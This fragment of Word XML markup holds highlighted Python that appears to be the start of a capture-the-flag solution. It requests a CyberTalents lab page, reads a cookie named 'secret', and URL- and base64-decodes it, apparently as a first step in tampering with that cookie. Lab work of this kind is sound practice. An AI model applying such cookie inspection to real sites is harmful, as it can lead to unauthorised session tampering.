          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="C586C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3AFB6068" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="C586C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="58AE3B50" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="DCDCAA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="C586C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>urllib</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>parse</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="C586C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="DCDCAA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>unquote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F265B7B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D905B57" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560D1AC1" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"http://wcamxwl32pue3e6m5l3n94wbq36omqvrw6lpc2zo-web.cybertalentslabs.com/index.php"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC84B95" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52087B6E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#request session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A73FECF" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F03087E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72699393" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>generate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> request 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574F6B62" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>r1</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="DCDCAA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD7678B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EAC0A47" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#encrypted cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791303E8" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>enc</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="DCDCAA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>unquote</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cookies</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'secret'</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6989CB5F" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664BF186" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#decoding cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7D7EBF" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>dec</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="DCDCAA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b64decode</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>enc</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
